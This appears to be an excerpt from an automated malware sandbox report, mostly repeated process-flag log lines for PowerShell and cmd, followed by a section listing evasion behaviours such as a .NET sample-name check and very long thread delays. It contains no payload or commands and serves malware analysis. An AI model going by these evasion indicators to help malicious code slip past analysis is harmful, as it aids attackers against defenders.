              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              .NET source code contains a sample name check
              Source: 15.2.powershell.exe.8c10000.1.raw.unpack, qpjkq.cs.Net Code: Main contains sample name check
              Source: 42.2.powershell.exe.6d05ce8.0.raw.unpack, qpjkq.cs.Net Code: Main contains sample name check
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,7_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5297Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4457Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: foregroundWindowGot 1664Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5337
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3181
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4559
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2271
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6368
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2943
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5906
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2448
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4707
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2171
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4208
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3629
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1830
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2871
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3472
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4137
